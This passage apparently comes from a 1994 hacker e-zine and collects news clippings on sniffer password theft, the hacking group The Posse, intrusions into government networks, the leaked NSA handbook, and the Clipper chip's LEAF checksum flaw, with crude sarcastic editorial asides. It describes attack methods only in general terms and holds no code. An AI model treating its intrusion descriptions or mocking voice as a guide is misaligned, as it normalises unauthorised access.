  22538. The Federal Bureau of Investigation has been investigating the
  22539. so-called "sniffer" attacks since February, but security experts
  22540. say the intrusions are continuing -- spurred, in part, by the
  22541. publication last month of line-by-line instructions for the
  22542. offending software in an on-line magazine for hackers.
  22543.  
  22544. Computer security experts say the recent rash of password piracy
  22545. using the Internet is much more serious than earlier security
  22546. violations, like the electronic "worm" unleashed in 1988 by
  22547. Cornell University graduate student Robert Morris.
  22548.  
  22549. "This is a major concern for the whole country," she says.
  22550. "I've had some sleepless nights just thinking about what could
  22551. happen. It's scary. Once someone has your ID and your password,
  22552. they can read everything you own, erase it or shut a system down.
  22553. They can steal proprietary information and sell it, and you might
  22554. not even know it's gone."
  22555.  
  22556. "Society has shifted in the last few years from just using
  22557. computers in business to being absolutely dependent on them and the
  22558. information they give us -- and the bad guys are beginning to
  22559. appreciate the value of information," says Dain Gary, manager of
  22560. the Computer Emergency Response Team (CERT), a crack team of
  22561. software experts at Carnegie-Mellon University in Pittsburgh that
  22562. is supported by the Defense Department's Advanced Research Projects
  22563. Agency.
  22564.  
  22565. Gary says the current rash of Internet crime appears to be the
  22566. work of a "loosely knit but fairly organized group" of computer
  22567. hackers adept not only at breaking and entering, but at hiding
  22568. their presence once they're in.
  22569.  
  22570. Most of the recent break-ins follow a similar pattern. The
  22571. intruders gain access to a computer system by locating a weakness
  22572. in its security system -- what software experts call an "unpatched
  22573. vulnerability."
  22574.  
  22575. Once inside, the intruders install a network monitoring program,
  22576. a "sniffer," that captures and stores the first 128 keystrokes
  22577. of all newly opened accounts, which almost always includes a user's
  22578. log-on and password.
  22579.  
  22580. "We really got concerned when we discovered that the code had
  22581. been published in Phrack, an on-line magazine for hackers, on April
  22582. 1," he says. "Putting something like that in Phrack is a little
  22583. like publishing the instructions for converting semiautomatic
  22584. weapons into automatics.
  22585.  
  22586. Even more disturbing to security experts is the absence of a
  22587. foolproof defense. CERT has been working with computer system
  22588. administrators around the country to shore up electronic security,
  22589. but the team concedes that such "patches" are far from perfect.
  22590.  
  22591. [Look for plans on converting semiautomatic weapons into automatics
  22592.  in the next issue.]
  22593. ------------------------------------------------------------------------------
  22594.  
  22595. Information Superhighwaymen - Hacker Menace Persists                  May 1994
  22596. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  22597. (Open Computing) (Page 25)
  22598.  
  22599. Once again the Internet has been labeled a security problem.  And a new
  22600. breed of hackers has attracted attention for breaking into systems.
  22601. "This is a group of people copying what has been done for years," says
  22602. Chris Goggans, aka Erik Bloodaxe.  "There's one difference:  They don't
  22603. play nice."
  22604.  
  22605. Goggans was a member of the hacker gang called the Legion of Doom in the
  22606. late '80s to early '90s.  Goggans says the new hacking group, which goes
  22607. by the name of "The Posse," has broken into numerous Business Week 1000
  22608. companies including Sun Microsystems Inc., Boeing, and Xerox.  He says
  22609. they've logged onto hundreds of universities and online services like
  22610. The Well.  And they're getting root access on all these systems.
  22611.  
  22612. For their part, The Posse--a loose band of hackers--isn't talking.
  22613.  
  22614. ------------------------------------------------------------------------------
  22615.  
  22616. Security Experts:  Computer Hackers a Growing Concern            July 22, 1994
  22617. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  22618. New York Times News Wire (Virginian-Pilot and Ledger Star) (2A)
  22619.  
  22620. Armed with increasing sophisticated snooping tools, computer programmers
  22621. operating both in the United States and abroad have gained unauthorized
  22622. access to hundreds of sensitive but unclassified government and military
  22623. computer networks called Internet, computer security experts said.
  22624.  
  22625. Classified government and military data, such as those that control
  22626. nuclear weapons, intelligence and other critical functions, are not
  22627. connected to the Internet and are believed to be safe from the types of
  22628. attacks reported recently.
  22629.  
  22630. The apparent ease with which hackers are entering military and government
  22631. systems suggests that similar if not greater intrusions are under way on
  22632. corporate, academic and commercial networks connected to the Internet.
  22633.  
  22634. Several sources said it was likely that only a small percentage of
  22635. intrusions, perhaps fewer than 5 percent, have been detected.
  22636.  
  22637. ------------------------------------------------------------------------------
  22638.  
  22639. NSA Semi-confidential Rules Circulate
  22640. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  22641. By Keay Davidson (San Francisco Examiner) (Page A1)
  22642.  
  22643. It arrived mysteriously at an Austin, Texas, post office box by "snail
  22644. mail" - computerese for the Postal Service.  But once the National Security
  22645. Agency's employee handbook was translated into bits and bytes, it took
  22646. only minutes to circulate across the country.
  22647.  
  22648. Thus did a computer hacker in Texas display his disdain for government
  22649. secrecy last week - by feeding into public computer networks the
  22650. semiconfidential document, which describes an agency that, during the darkest
  22651. days of the Cold War, didn't officially "exist."
  22652.  
  22653. Now, anyone with a computer, telephone, modem and basic computer skills
  22654. can read the 36-page manual, which is stamped "FOR OFFICIAL USE ONLY" and
  22655. offers a glimpse of the shadowy world of U.S. intelligence - and the personal
  22656. price its inhabitants pay.
  22657.  
  22658. "Your home, car pool, and public places are not authorized areas to
  22659. conduct classified discussions - even if everyone involved in the discussion
  22660. possesses a proper clearance and "need-to-know.' The possibility that a
  22661. conversation could be overheard by unauthorized persons dictates the need to
  22662. guard against classified discussions in non-secure areas."
  22663.  
  22664. The manual is "so anal retentive and paranoid. This gives you some
  22665. insight into how they think," said Chris Goggans, the Austin hacker who
  22666. unleashed it on the computer world. His on-line nom de plume is "Erik
  22667. Bloodaxe" because "when I was about 11, I read a book on Vikings, and that
  22668. name really struck me."
  22669.  
  22670. NSA spokeswoman Judi Emmel said Tuesday that "apparently this document is
  22671. an (NSA) employee handbook, and it is not classified."    Rather, it is an
  22672. official NSA employee manual and falls into a twilight zone of secrecy. On
  22673. one hand, it's "unclassified." On the other hand, it's "FOR OFFICIAL USE
  22674. ONLY" and can be obtained only by filing a formal request under the U.S.
  22675. Freedom of Information Act, Emmel said.
  22676.  
  22677. "While you may take this handbook home for further study, remember that
  22678. it does contain "FOR OFFICIAL USE ONLY' information which should be
  22679. protected," the manual warns. Unauthorized release of such information could
  22680. result in "appropriate administrative action ... (and) corrective and/or
  22681. disciplinary measures."
  22682.  
  22683. Goggans, 25, runs an on-line electronic "magazine" for computer hackers
  22684. called Phrack, which caters to what he calls the "computer underground." He
  22685. is also a computer engineer at an Austin firm, which he refuses to name.
  22686.  
  22687. The manual recently arrived at Goggans' post office box in a white
  22688. envelope with no return address, save a postmark from a Silicon Valley
  22689. location, he says. Convinced it was authentic, he typed it into his computer,
  22690. then copied it into the latest issue of Phrack.
  22691.  
  22692. Other hackers, like Grady Ward of Arcata, Humboldt County, and Jeff
  22693. Leroy Davis of Laramie, Wyo., redistributed the electronic files to computer
  22694. users' groups. These included one run by the Cambridge, Mass.-based
  22695. Electronic Frontier Foundation, which fights to protect free speech on
  22696. computer networks.
  22697.  
  22698. Ward said he helped redistribute the NSA manual "to embarrass the NSA"
  22699. and prove that even the U.S. government's most covert agency can't keep
  22700. documents secret.
  22701.  
  22702. The action also was aimed at undermining a federal push for
  22703. data-encryption regulations that would let the government tap into computer
  22704. networks, Ward said.
  22705.  
  22706. [Yeah...sure it was, Grady.]
  22707. ------------------------------------------------------------------------------
  22708.  
  22709. Hackers Stored Pornography in Computers at Weapons Lab           July 13, 1994
  22710. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  22711. by Adam S. Bauman (Virginian-Pilot and Ledger-Star) (Page A6)
  22712.  
  22713. One of the nation's three nuclear weapons labs has confirmed that
  22714. computer hackers were using its computers to store and distribute
  22715. hard-core pornography.
  22716.  
  22717. The offending computer, which was shut down after a Los Angeles Times
  22718. reporter investigating Internet hacking alerted lab officials, contained
  22719. more than 1,000 pornographic images.  It was believed to be the largest
  22720. cache of illegal hardcore pornography ever found on a computer network.
  22721.  
  22722. At Lawrence Livermore, officials said Monday that they believed at least
  22723. one lab employee was involved in the pornography ring, along with an
  22724. undetermined number of outside collaborators.
  22725.  
  22726. [Uh, let me see if I can give this one a go:
  22727.  
  22728.  A horny lab technician at LLNL.GOV uudecoded gifs for days on end
  22729.  from a.b.p.e.  After putting them up on an FSP site, a nosey schlock
  22730.  reporter blew the whistle, and wrote up a big "hacker-scare" article.
  22731.  
  22732.  The top-notch CIAC team kicked the horn-dog out the door, and began
  22733.  frantically scouring the big Sun network at LLNL for other breaches,
  22734.  all the while scratching their heads at how to block UDP-based apps
  22735.  like FSP at their firewall.  MPEGs at 11.
  22736.  
  22737.  How does shit like this get printed????]
  22738.  
  22739. ------------------------------------------------------------------------------
  22740.  
  22741. Clipper Flaw May Thwart Fed Effort                                June 6, 1994
  22742. by Aaron Zitner (Boston Globe)
  22743.  
  22744. Patents, Technical Snares May Trip Up the 'Clipper'               June 6, 1994
  22745. by Sharon Fisher (Communications Week) (Page 1)
  22746.  
  22747. [Clipper, Flipper, Slipper.  It's all a big mess, and has obsoleted
  22748. itself.  But, let's sum up the big news:
  22749.  
  22750.  How the Clipper technology is SUPPOSED to work
  22751.  
  22752.  1) Before an encoded message can be sent, a clipper computer chip
  22753.  assigns and tests a scrambled group of numbers called a LEAF, for
  22754.  Law Enforcement Access Field.  The LEAF includes the chip's serial
  22755.  number, a "session key" number that locks the message and a "checksum"
  22756.  number that verifies the validity of the session key.
  22757.  
  22758.  2) With a warrant to wiretap, a law-enforcement agency like the FBI
  22759.  could record the message and identify the serial number of a Clipper
  22760.  chip.  It would then retrieve from custodial agencies the two halves of
  22761.  that chip's decoding key.
  22762.  
  22763.  3) Using both halves of the decoding key, the FBI would be able to
  22764.  unscramble the session key number, thus unlocking the messages or data
  22765.  that had been protected.
  22766.  
  22767.  How the Clipper technology is FLAWED  (YAY, Matt Blaze!)
  22768.  
  22769.  1) Taking advantage of design imperfections, people trying to defeat
  22770.  the system could replace the LEAF until it erroneously passed the
  22771.  "checksum" verification, despite an invalid session-key number.
  22772.  
  22773.  2) The FBI would still be able to retrieve a decoding key, but it would
  22774.  prove useless.
  22775.  
  22776.  3) Because the decoding key would not be able to unscramble the invalid
  22777.  session key, the message would remain locked.]
  22778.